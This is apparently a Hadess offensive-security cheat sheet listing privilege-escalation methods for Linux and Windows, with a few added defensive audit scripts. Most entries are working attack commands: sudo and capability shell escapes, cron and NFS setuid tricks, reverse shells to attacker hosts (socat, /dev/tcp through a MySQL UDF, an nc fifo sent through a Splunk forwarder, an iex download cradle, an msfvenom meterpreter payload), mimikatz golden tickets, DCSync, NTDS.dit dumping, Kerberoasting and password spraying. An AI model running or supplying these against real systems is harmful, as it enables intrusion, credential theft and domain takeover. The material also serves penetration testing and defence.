
WWW.HADESS.IO

40 METHODS FOR PRIVILEGE ESCALATION
PART 1

HADESS | SECURE AGILE DEVELOPMENT


ABUSING SUDO BINARIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Privileged Files

Each entry needs a sudo rule that lets the current user run that binary as root (check with sudo -l); the binary is then told to spawn a shell, which keeps root.

sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
sudo env /bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo less /etc/hosts     (then at the pager prompt: !bash)
sudo man man             (then at the pager prompt: !bash)
sudo ftp                 (then at the ftp> prompt: ! /bin/bash)

socat reverse shell (start the attacker side first):
  Attacker: socat file:`tty`,raw,echo=0 tcp-listen:1234
  Victim:   sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234

echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
sudo gcc -wrapper /bin/bash,-s .
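The rules above are only useful if sudo -l actually grants one of those binaries. The script below is an added example, not part of the Hadess deck: it reads sudo -l output, prints every rule whose command is on a hand-picked GTFOBins-style list (or is ALL), and separately reports env_keep settings that let LD_PRELOAD through. The sudo -l text, user and host names are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not part of the Hadess deck: audit "sudo -l" output for
# binaries with well-known shell escapes and for env_keep settings that let
# LD_PRELOAD through. SAMPLE_SUDO_L is constructed; "dev" and "web01" are
# made up names.

# Binaries with documented sudo shell escapes (hand-picked subset of GTFOBins).
GTFOBINS="vim vi find nmap env awk perl python python3 less more man ftp socat zip gcc tar bash sh"

# stdin: text of "sudo -l". stdout: "<basename> <rule>" for every rule whose
# command is in GTFOBINS (or is ALL). Rules that pin arguments still print,
# because whether fixed arguments block the escape needs a manual look.
risky_sudo_rules() {
    while IFS= read -r line; do
        case "$line" in
            *"("*")"*) ;;          # rule lines look like "(root) NOPASSWD: /bin/x, /bin/y"
            *) continue ;;
        esac
        cmds=${line#*)}
        cmds=${cmds#*PASSWD:}      # strips either "NOPASSWD:" or "PASSWD:"
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
            if [ -z "$cmd" ]; then continue; fi
            bin=${cmd%% *}         # first word is the binary path
            base=${bin##*/}
            hit=""
            for g in $GTFOBINS; do
                if [ "$base" = "$g" ]; then hit=1; fi
            done
            if [ -n "$hit" ] || [ "$bin" = "ALL" ]; then
                printf '%s %s\n' "$base" "$cmd"
            fi
        done
    done
    return 0
}

# stdin: text of "sudo -l". stdout: env_keep / SETENV fragments that make
# "sudo LD_PRELOAD=/tmp/x.so <cmd>" possible; prints nothing when clean.
sudo_env_leaks() {
    grep -oE 'env_keep[+ ]*=[^,]*LD_(PRELOAD|LIBRARY_PATH)|SETENV:' || true
}

# Constructed sample of what "sudo -l" prints.
SAMPLE_SUDO_L='Matching Defaults entries for dev on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User dev may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/find
    (root) /usr/bin/systemctl status nginx
    (www-data) NOPASSWD: /usr/bin/python3 /opt/app/manage.py'

# On a real host:  sudo -l 2>/dev/null | risky_sudo_rules
printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_env_leaks
```

The sample yields three hits (vim, find and the argument-pinned python3 rule) and one env_keep leak; systemctl is not reported because it has no listed escape.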
ABUSING SCHEDULED TASKS
Domain: Y/N | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks

Precondition: a root cron job runs /home/user/systemupdate.sh (or another script the user can write to). Overwrite it, wait for the job to fire, then use the now-setuid bash.

echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
Wait a while (until the cron job has run)
/bin/bash -p
id && whoami
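Finding such a job is the actual work. The script below is an added example, not part of the Hadess deck: it parses a crontab in /etc/crontab format and reports scripts the current user can write to, PATH directories the current user can write to (the PATH-overwrite variant), and bare command names that do not resolve on cron's PATH. The crontab and the files it points at are constructed under a temporary directory; on a real host run it against /etc/crontab and /etc/cron.d/*.

```bash
#!/usr/bin/env bash
# Added example, not part of the Hadess deck: find root cron jobs whose script
# (or whose PATH lookup) a low-privileged user can write to. All paths below
# are constructed demo data under a temp directory.

# $1: crontab in /etc/crontab format (min hour dom mon dow user command).
# Prints one of:
#   WRITABLE <path> (<user>: <command>)   the script is writable by us
#   PATH-WRITABLE <dir>                   a directory on cron's PATH is writable by us
#   UNRESOLVED <name>                     bare command not found on cron's PATH
#                                         (a writable PATH dir ahead of it wins)
audit_crontab() {
    crontab_file=$1
    cron_path=$(grep -E '^PATH=' "$crontab_file" | head -n 1 | cut -d= -f2-)
    for dir in $(printf '%s\n' "$cron_path" | tr ':' ' '); do
        if [ -d "$dir" ] && [ -w "$dir" ]; then printf 'PATH-WRITABLE %s\n' "$dir"; fi
    done
    # skip comments, blank lines and VAR=value lines
    grep -vE '^[[:space:]]*(#|$|[A-Z_]+=)' "$crontab_file" |
    while read -r min hour dom mon dow user cmd; do
        bin=${cmd%% *}
        target=""
        case "$bin" in
            /*) target=$bin ;;
            *)  for dir in $(printf '%s\n' "$cron_path" | tr ':' ' '); do
                    if [ -e "$dir/$bin" ]; then target="$dir/$bin"; break; fi
                done ;;
        esac
        if [ -z "$target" ]; then
            printf 'UNRESOLVED %s\n' "$bin"
        elif [ -w "$target" ]; then
            printf 'WRITABLE %s (%s: %s)\n' "$target" "$user" "$cmd"
        fi
    done
    return 0
}

# Constructed demo layout: a world-writable script run by root every 5 minutes,
# a writable directory first on cron's PATH, and a job that calls a bare name.
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir -p "$demo/opt/scripts" "$demo/usr/local/bin"
printf '#!/bin/sh\necho backup\n' > "$demo/opt/scripts/backup.sh"
chmod 777 "$demo/opt/scripts/backup.sh"        # the bug
cat > "$demo/crontab" <<EOF
PATH=$demo/usr/local/bin:/nonexistent/bin
# m h dom mon dow user command
*/5 * * * * root $demo/opt/scripts/backup.sh
0 3 * * * root cleanup.sh --all
EOF

audit_crontab "$demo/crontab"
```

For the demo crontab this prints a PATH-WRITABLE line for the writable bin directory, a WRITABLE line for backup.sh, and UNRESOLVED cleanup.sh, which is exactly the situation where dropping a cleanup.sh into the writable PATH directory gets it executed as root.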


GOLDEN TICKET WITH SCHEDULED TASKS
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abusing Scheduled Tasks

1. mimikatz# token::elevate
2. mimikatz# vault::cred /patch
3. mimikatz# lsadump::lsa /patch
4. mimikatz# kerberos::golden /user:Administrator /rc4:<krbtgt NTLM from step 3> /domain:<DOMAIN> /sid:<DOMAIN SID> /sids:<extra SIDs, e.g. Enterprise Admins> /ticket:<OUTPUT TICKET PATH>
5. powercat -l -v -p 443
6. schtasks /create /S <DC HOST> /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://10.10.10.10/reverse.ps1)'"
7. schtasks /run /S <DC HOST> /TN "enterprise"

A golden ticket is forged with the krbtgt account's key and the domain SID, not with an individual user's hash; lsadump::lsa /patch on a domain controller returns the krbtgt hash. The listener in step 5 must be up before step 7 fires the task.


ABUSING INTERPRETER CAPABILITIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Capabilities

1. getcap -r / 2>/dev/null
   a. /usr/bin/python2.6 = cap_setuid+ep
   b. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
   c. id && whoami
2. getcap -r / 2>/dev/null
   a. /usr/bin/perl = cap_setuid+ep
   b. /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
   c. id && whoami


ABUSING BINARY CAPABILITIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Capabilities

1. getcap -r / 2>/dev/null
2. /usr/bin/tar = cap_dac_read_search+ep      (tar may read any file regardless of its permissions)
3. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
4. /usr/bin/tar -xvf key.tar                  (extracts root/.ssh/id_rsa under the current directory; use it with ssh -i)
5. openssl req -engine /tmp/priv.so           (separate variant: an openssl binary carrying cap_setuid loads an engine library that calls setuid(0) and starts a shell)
6. /bin/bash -p
7. id && whoami
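Both capability cards start from the same getcap -r / listing, and the dangerous lines are easy to miss among harmless ones such as cap_net_raw on ping. The script below is an added example, not part of the Hadess deck: it parses getcap output in both the older "/path = cap+ep" and the newer "/path cap=ep" formats, splits comma-separated capability lists, and flags the capabilities that give a direct route to root. The sample listing is constructed.

```bash
#!/usr/bin/env bash
# Added example, not part of the Hadess deck: parse "getcap -r / 2>/dev/null"
# output and flag capabilities that give a direct route to root. SAMPLE_GETCAP
# is constructed.

# Capabilities worth flagging and what each one buys:
#   cap_setuid / cap_setgid         call setuid(0) from an interpreter (python, perl)
#   cap_dac_read_search             read any file (/etc/shadow, /root/.ssh/id_rsa), e.g. with tar
#   cap_dac_override / cap_fowner   write any file (/etc/passwd, /etc/sudoers)
#   cap_chown, cap_setfcap, cap_sys_admin, cap_sys_ptrace, cap_sys_module: other root paths
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_read_search cap_dac_override cap_fowner cap_chown cap_setfcap cap_sys_admin cap_sys_ptrace cap_sys_module"

# stdin: getcap output. stdout: "<path> <cap>" per dangerous capability found.
flag_dangerous_caps() {
    while IFS= read -r line; do
        if [ -z "$line" ]; then continue; fi
        case "$line" in
            *" = "*) path=${line%% = *}; caps=${line#* = } ;;   # older libcap: "/p = caps+ep"
            *)       path=${line%% *};   caps=${line#* }   ;;   # newer libcap: "/p caps=ep"
        esac
        caps=${caps%%[+=]*}     # "cap_setuid,cap_net_raw+ep" -> "cap_setuid,cap_net_raw"
        printf '%s\n' "$caps" | tr ',' '\n' | while IFS= read -r c; do
            for d in $DANGEROUS_CAPS; do
                if [ "$c" = "$d" ]; then printf '%s %s\n' "$path" "$c"; fi
            done
        done
    done
    return 0
}

# Constructed sample mixing both output formats.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/perl cap_setuid=ep
/usr/bin/tar cap_dac_read_search=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/sbin/arping cap_net_raw,cap_setuid=ep'

# On a real host:  getcap -r / 2>/dev/null | flag_dangerous_caps
printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
```

The sample produces four hits (python2.6, perl and arping with cap_setuid; tar with cap_dac_read_search); ping and gnome-keyring-daemon are not reported.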


ABUSING ACTIVESESSIONS CAPABILITIES
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Capabilities

1. Download https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
2. . .\Heidi.ps1      (dot-source the downloaded script; the deck saved it under this name)
3. Invoke-SQLOSCmd -Verbose -Command "net localgroup administrators user1 /add" -Instance COMPUTERNAME

Works when the current Windows session is sysadmin on the local SQL Server instance: xp_cmdshell then runs the command as the SQL Server service account.


ESCALATE WITH TRUSTWORTHY IN SQL SERVER
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abusing Capabilities

1. . .\PowerUpSQL.ps1
2. Get-SQLInstanceLocal -Verbose
3. (Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.10" -Query 'select * from master..sysservers').CustomQuery
4. Through the linked server, enumerate objects and enable xp_cmdshell:
   USE "master";
   SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF', 'IF');
   execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN>\<DATABASE NAME>"
5. powershell -ep bypass
6. Import-Module .\powercat.ps1
7. powercat -l -v -p 443 -t 10000
8. Run the payload through the link:
   execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<DOMAIN>\<DATABASE NAME>"

Notes: execute(...) at <link> needs "RPC Out" enabled on the linked server, and xp_cmdshell is an advanced option, so if the RECONFIGURE is rejected run sp_configure 'show advanced options',1; RECONFIGURE first. The listener in step 7 must be up before step 8.
ABUSING MYSQL RUN AS ROOT
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Abusing Services

1. ps aux | grep root         (confirm mysqld is running as root)
2. mysql -u root -p
3. \! chmod +s /bin/bash      (\! runs a shell command from the mysql client)
4. exit
5. /bin/bash -p
6. id && whoami

Caveat: \! executes on the client side with the privileges of the mysql client process, so this needs the client itself to run as root (for example through a sudo rule for mysql). If only the server runs as root, use the MySQL UDF method further down, which executes inside mysqld.


ABUSING JOURNALCTL
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Services

1. journalctl      (run with root privileges, e.g. via a sudo rule; when the output is longer than the terminal it opens in the less pager)
2. !/bin/sh        (typed at the pager prompt; the shell inherits the pager's privileges)


ABUSING VDS
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Services

1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'

Invoke-ServiceAbuse works against a service whose configuration the current user may change (Get-ModifiableService lists them): it rewrites the service binary path, restarts the service so the command runs as SYSTEM, then restores the original path. With -UserName it adds that account to the local Administrators group.


ABUSING BROWSER
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Services

1. . .\PowerUp.ps1
2. Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

Same mechanism as the VDS card, against the Computer Browser service.


ABUSING LDAP
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Abusing Services

Precondition: credentials that can write to the directory, on a network where Linux hosts take SSH keys and uid/gid from LDAP. The first modification adds the OpenSSH LPK schema; the second attaches a public key to the user and changes the uidNumber/gidNumber the hosts will map the account to.

0. ldapmodify -x -D <BIND DN> -w PASSWORD      (-D is required to bind as a user; the deck omitted it)
1. Paste this:
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
  DESC 'MANDATORY: OpenSSH Public key'
  EQUALITY octetStringMatch
  SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
  DESC 'MANDATORY: OpenSSH LPK objectclass'
  MAY ( sshPublicKey $ uid )
  )

2. ldapmodify -x -D <BIND DN> -w PASSWORD
3. Paste this:
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: <content of id_rsa.pub>
-
replace: uidNumber
uidNumber: <TARGET UID, 0 for root>
-
replace: gidNumber
gidNumber: <TARGET GID, 0 for root>

In LDIF the attribute name follows "replace:" and the new value comes on the next line; the deck's placeholders for these two lines were garbled and are reconstructed here. Lines beginning with a space continue the previous attribute.


LLMNR POISONING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abusing Services

1. responder -I eth1 -v
2. Create Book.url and drop it in a share users browse; Explorer fetches the icon over SMB and hands the user's NetNTLM hash to Responder:
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico


ABUSING CERTIFICATE SERVICES
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abusing Services

adcspwn coerces a machine account to authenticate and relays that authentication to the AD CS web enrollment endpoint to obtain a certificate for the coerced computer (the ESC8 relay).
1. adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
2. adcspwn.exe --adcs cs.pwnlab.local
3. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
4. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
5. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local


MYSQL UDF CODE INJECTION
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Injection

Needs the MySQL root (or FILE-privileged) account and a mysqld running as root; sys_exec then runs the command as the daemon's user.
1. mysql -u root -p
2. mysql> use mysql;
3. mysql> create table admin(line blob);
4. mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
5. mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';
6. mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
7. mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');

On current MySQL versions the library must be written into the directory shown by "show variables like 'plugin_dir';" (typically /usr/lib/mysql/plugin/) or create function fails, and secure_file_priv may restrict where dumpfile can write.



IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

1. SharpImpersonation.exe user:<user> shellcode:<URL>
2. SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnUser



IMPERSONATION TOKEN WITH SEIMPERSONATEPRIVILEGE
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

1. execute-assembly sweetpotato.exe -p beacon.exe      (from a Cobalt Strike beacon that holds SeImpersonatePrivilege, e.g. a service account; beacon.exe is started as SYSTEM)



IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

1. EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys


OPENVPN CREDENTIALS
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Enumeration & Hunt

1. locate *.ovpn      (then check each profile for an auth-user-pass <file> line; the referenced file holds a cleartext username and password)


BASH HISTORY
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Enumeration & Hunt

1. history
2. cat /home/<user>/.bash_history
3. cat ~/.bash_history | grep -i passw


PACKET CAPTURE
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Sniff

1. tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='


NFS ROOT SQUASHING
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Remote Procedure Calls (RPC)

Works when the export is configured with no_root_squash: root on the attacking machine keeps uid 0 on the mounted share, so a setuid-root bash written there is setuid-root on the victim as well.
1. showmount -e <victim_ip>
2. mkdir /tmp/mount
3. mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
4. cd /tmp/mount
5. cp /bin/bash .        (the copy must run on the victim: same architecture and a compatible libc)
6. chmod +s bash
Then, on the victim: /tmp/bash -p
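The server-side condition is a single option in /etc/exports. The script below is an added example, not part of the Hadess deck: it parses /etc/exports syntax and prints every export/client pair that carries no_root_squash, which is the check to run on an NFS server (or on a copy of its exports file) before or after trying the steps above. The exports content is constructed.

```bash
#!/usr/bin/env bash
# Added example, not part of the Hadess deck: list NFS exports that disable
# root squashing (no_root_squash). SAMPLE_EXPORTS is constructed.
# On the NFS server:  no_root_squash_exports < /etc/exports

# stdin: /etc/exports text. stdout: "<export path> <client spec>" per vulnerable entry.
no_root_squash_exports() {
    (
        set -f                      # a "*" client spec must not be glob-expanded
        sed -e 's/#.*//' -e '/^[[:space:]]*$/d' |
        while read -r path clients; do
            for spec in $clients; do     # e.g. 10.0.0.0/24(rw,sync)  or  *(rw,no_root_squash)
                client=${spec%%"("*}
                opts=${spec#*"("}
                opts=${opts%")"}
                case ",$opts," in
                    *,no_root_squash,*) printf '%s %s\n' "$path" "${client:-*}" ;;
                esac
            done
        done
    )
}

# Constructed sample: one safe export, one open to everyone, one mixed line.
SAMPLE_EXPORTS='# /etc/exports
/srv/backup   10.10.10.0/24(rw,sync,no_subtree_check)
/tmp          *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/dev     10.10.10.5(rw,no_root_squash) 10.10.10.6(ro)'

printf '%s\n' "$SAMPLE_EXPORTS" | no_root_squash_exports
```

The sample reports "/tmp *" and "/home/dev 10.10.10.5"; /srv/backup and the read-only 10.10.10.6 entry are not listed. Removing no_root_squash (the default is root_squash, which maps remote uid 0 to nobody) closes the setuid-copy trick.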


ABUSING ACCESS CONTROL LIST
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

1. $user = "megacorp\jorden"
2. $folder = "C:\Users\administrator"
3. $acl = get-acl $folder
4. $aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"
5. $aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
6. $acl.AddAccessRule($aclrule)
7. set-acl -path $folder -AclObject $acl
8. get-acl $folder | Format-List

set-acl succeeds only if the current user already holds WriteDAC (or owns the folder); the new rule then grants $user full control over the folder and everything inherited below it.


ESCALATE WITH SEBACKUPPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

1. import-module .\SeBackupPrivilegeUtils.dll
2. import-module .\SeBackupPrivilegeCmdLets.dll
3. Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

z: is a shadow copy of the system volume exposed with diskshadow (see "Dumping with diskshadow"); ntds.dit is locked on the live volume. Copy the SYSTEM hive from the same shadow copy, since it holds the key needed to decrypt the hashes.


ESCALATE WITH SEIMPERSONATEPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

1. https://github.com/dievus/printspoofer
2. printspoofer.exe -i -c "powershell -c whoami"


ESCALATE WITH SELOADDRIVERPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

FIRST:
Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
Download https://github.com/tandasat/ExploitCapcom
Change ExploitCapcom.cpp line 292 from
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
    TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe

SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
4. In msf, run the handler (exploit/multi/handler with the same payload, LHOST and LPORT) before step 3 so the shell has something to connect to.

eoploaddriver registers the signed-but-vulnerable Capcom.sys under the given registry key and loads it with NtLoadDriver, which SeLoadDriverPrivilege permits; ExploitCapcom then uses the driver's arbitrary-code primitive to launch shell.exe as SYSTEM.


ESCALATE WITH FORCECHANGEPASSWORD
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module .\PowerView_dev.ps1
$pass = ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity user1 -AccountPassword $pass -Verbose
Enter-PSSession -ComputerName COMPUTERNAME -Credential (Get-Credential)

Requires the User-Force-Change-Password right over user1; the cmdlet resets the password without knowing the old one (the user notices, since the old password stops working). The -AccountPassword argument and the credential prompt were left blank in the deck and are filled in here with placeholder values.


ESCALATE WITH GENERICWRITE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

Targeted Kerberoast: with GenericWrite over USER1, set a servicePrincipalName on it, request the service ticket, and crack it offline.
$pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER USER', $pass)
Set-DomainObject -Credential $creds -Identity USER1 -Clear serviceprincipalname
Set-DomainObject -Credential $creds -Identity USER1 -Set @{serviceprincipalname='none/fluu'}
.\Rubeus.exe kerberoast /domain:<DOMAIN>

Clear the SPN again afterwards; the ticket only cracks if USER1 has a weak password.


ABUSING GPO
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

1. .\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

Needs write access to the GPO object (e.g. GenericWrite on it); the immediate scheduled task runs as SYSTEM on every computer the GPO applies to at the next Group Policy refresh.


PASS-THE-TICKET
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Ticket

1. .\Rubeus.exe asktgt /user:<USER>$ /rc4:<NTLM HASH> /ptt
2. klist

asktgt with a hash is overpass-the-hash: Rubeus requests a fresh TGT with the account's key and injects it into the current logon session (/ptt); the <USER>$ form is a computer account. klist confirms the ticket is in the cache.


GOLDEN TICKET
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Ticket

1. mimikatz # lsadump::dcsync /user:krbtgt
2. mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN SID> /rc4:<krbtgt NTLM HASH> /id:<USER RID>

DCSync needs replication rights (Domain Admins or equivalent). The forged TGT is signed with the krbtgt key, which is why that account's hash is the one to dump; the deck's "/rce:" was a typo for /rc4:.


ABUSING SPLUNK UNIVERSAL FORWARDER
Domain: Yes | Local Admin: Y/N | OS: Linux/Windows | Type: Abuse Channel

python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

The forwarder's management port (8089/tcp) accepts an app containing a scripted input from anyone with valid credentials and runs the script as the forwarder's own user, which is frequently root or SYSTEM.


ABUSING GDBUS
Domain: No | Local Admin: Yes | OS: Linux | Type: Abuse Channel

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true

The usb-creator D-Bus helper's Image method copies the source file to the destination as root without a polkit check, so a user-controlled authorized_keys lands in /root/.ssh/ and ssh root@localhost with the matching key follows.


ABUSING TRUSTED DC
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Channel

1. Find a user in the first DC
2. If port 6666 is reachable (a WinRM listener on a non-default port)
3. proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666
4. .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
5. proxychains evil-winrm -u Administrator -p '<pass dumped in step 4>' -i 10.100.10.100 -P 6666


NTLM RELAY
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: NTLM

1. responder -I eth1 -v
2. ntlmrelayx.py …

When relaying, turn off Responder's own SMB and HTTP servers in Responder.conf so the captured authentication reaches ntlmrelayx instead; targets must not require SMB signing.


EXCHANGE RELAY
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: NTLM

1. responder -I eth1 -v
2. ./exchangeRelayx.py …


DUMPING WITH DISKSHADOW
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Dumping

1. priv.txt contains:
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
2. diskshadow /s priv.txt

The trailing "p" on every line is in the original script and is intentional: diskshadow truncates the last character of each line it reads from a script file, so each command is padded by one character. The exposed z: drive is what the SeBackupPrivilege copy above reads ntds.dit from.


DUMPING WITH VSSADMIN
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Dumping

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

Use the shadow copy volume name that vssadmin prints (the number after HarddiskVolumeShadowCopy increases with each snapshot). The SYSTEM hive is needed to decrypt NTDS.dit offline, e.g. with impacket's secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL.


PASSWORD SPRAYING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Spraying

./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123


AS-REP ROASTING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Kerberos

.\Rubeus.exe asreproast

Only accounts with "Do not require Kerberos preauthentication" set are affected; the returned AS-REP is crackable offline.


KERBEROASTING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Kerberos

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt


About Hadess
Savior of your Business to combat cyber threats

Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.

Contact Us
To request additional information about Hadess's services, please fill out the form below. A Hadess representative will contact you shortly.

Website: www.hadess.io
Email: [email protected]
Phone No.: +989362181112
Company No.: +982128427515, +982177873383
hadess_security


Hadess Products and Services

